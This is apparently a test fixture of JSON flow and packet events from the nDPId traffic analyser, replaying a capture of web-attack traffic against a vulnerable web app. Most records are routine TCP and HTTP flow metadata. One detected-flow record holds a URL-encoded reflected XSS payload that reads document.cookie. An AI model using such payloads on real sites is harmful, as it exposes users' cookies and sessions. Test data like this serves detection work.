+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347551495,"flow_last_seen":1499347556766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347552736,"flow_last_seen":1499347557766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347552736,"flow_last_seen":1499347557766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347679469,"flow_last_seen":1499347679469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347679469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1499347679469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347679469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80KNAAD4G9SysEAABwKgKMul8AFCXJE+kAAAAAKACchDuKwAAAgQFtAQCCAoBO58HAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5962,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":2,"flow_last_seen":1499347679469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347679469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6XyRTq6MlyRPpaAScSA6zgAAAgQFtAQCCAoD5XB8ATufBwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5963,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":3,"flow_last_seen":1499347679470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347679470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00KRAAD4G9TOsEAABwKgKMul8AFCXJE+lkU6ujYAQAOXZ1AAAAQEICgE7nwgD5XB8"} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347675703,"flow_last_seen":1499347679471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347679471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27SZGGJRXX6DR9VWKN864H8LTBEZ6QC3GJPC8TUUNAED3BBL4L8P%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347680746,"flow_last_seen":1499347680746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347680746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1499347680746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347680746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qSxAAD4GHKSsEAABwKgKMumKAFCMLAlrAAAAAKACchA+DwAAAgQFtAQCCAoBO6BHAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":2,"flow_last_seen":1499347680746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347680746,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6YpeBd3IjCwJbKAScSCNfgAAAgQFtAQCCAoD5XG8ATugRwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":3,"flow_last_seen":1499347680747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347680747,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qS1AAD4GHKusEAABwKgKMumKAFCMLAlsXgXdyYAQAOUshgAAAQEICgE7oEcD5XG8"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347683313,"flow_last_seen":1499347683313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347683313,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1499347683313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347683313,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8x61AAD4G\/iKsEAABwKgKMumkAFCTI2VlAAAAAKACchDYggAAAgQFtAQCCAoBO6LIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":2,"flow_last_seen":1499347683313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347683313,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6aQ4uuFckyNlZqAScSBHKAAAAgQFtAQCCAoD5XQ9ATuiyAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5992,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":3,"flow_last_seen":1499347683314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347683314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0x65AAD4G\/imsEAABwKgKMumkAFCTI2VmOLrhXYAQAOXmLgAAAQEICgE7oskD5XQ9"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347684563,"flow_last_seen":1499347684563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347684563,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1499347684563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347684563,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82yNAAD4G6qysEAABwKgKMumyAFDf7X8iAAAAAKACchBwtAAAAgQFtAQCCAoBO6QBAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":2,"flow_last_seen":1499347684563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347684563,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6bLDIQ3O3+1\/I6AScSAnSAAAAgQFtAQCCAoD5XV2ATukAQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":3,"flow_last_seen":1499347684564,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347684564,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02yRAAD4G6rOsEAABwKgKMumyAFDf7X8jwyENz4AQAOXGTwAAAQEICgE7pAED5XV2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347687089,"flow_last_seen":1499347687089,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347687089,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1499347687089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347687089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UahAAD4GdCisEAABwKgKMunMAFBn2\/fQAAAAAKACchBthwAAAgQFtAQCCAoBO6Z4AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":2,"flow_last_seen":1499347687089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347687089,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6cx2j8kIZ9v30aAScSCy+wAAAgQFtAQCCAoD5XftATumeAEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":3,"flow_last_seen":1499347687090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347687090,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UalAAD4GdC+sEAABwKgKMunMAFBn2\/fRdo\/JCYAQAOVSAgAAAQEICgE7pnkD5Xft"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347688364,"flow_last_seen":1499347688364,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688364,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1499347688364,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347688364,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8C45AAD4GukKsEAABwKgKMunaAFB\/Haw5AAAAAKACchCgjwAAAgQFtAQCCAoBO6e3AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":2,"flow_last_seen":1499347688365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347688365,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6dpm6d+Cfx2sOqAScSDd8AAAAgQFtAQCCAoD5XksATuntwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":3,"flow_last_seen":1499347688365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347688365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0C49AAD4GukmsEAABwKgKMunaAFB\/Haw6Zunfg4AQAOV8+AAAAQEICgE7p7cD5Xks"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347555255,"flow_last_seen":1499347560767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347555255,"flow_last_seen":1499347560767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347556523,"flow_last_seen":1499347561767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347556523,"flow_last_seen":1499347561767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347557789,"flow_last_seen":1499347563767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347557789,"flow_last_seen":1499347563767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347559043,"flow_last_seen":1499347564768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347559043,"flow_last_seen":1499347564768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347560327,"flow_last_seen":1499347565768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347560327,"flow_last_seen":1499347565768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347561622,"flow_last_seen":1499347566770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347561622,"flow_last_seen":1499347566770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347689613,"flow_last_seen":1499347689613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347689613,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1499347689613,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347689613,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80NlAAD4G9PasEAABwKgKMunoAFDCAng2AAAAAKACchCQZwAAAgQFtAQCCAoBO6jvAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":2,"flow_last_seen":1499347689613,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347689613,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6egCgzyzwgJ4N6AScSDTxgAAAgQFtAQCCAoD5XpkATuo7wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6046,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":3,"flow_last_seen":1499347689614,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347689614,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00NpAAD4G9P2sEAABwKgKMunoAFDCAng3AoM8tIAQAOVyzQAAAQEICgE7qPAD5Xpk"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347692128,"flow_last_seen":1499347692128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347692128,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1499347692128,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347692128,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8u5xAAD4GCjSsEAABwKgKMuoCAFDepxD4AAAAAKACchDYcQAAAgQFtAQCCAoBO6tkAAAAAAEDAwc="} 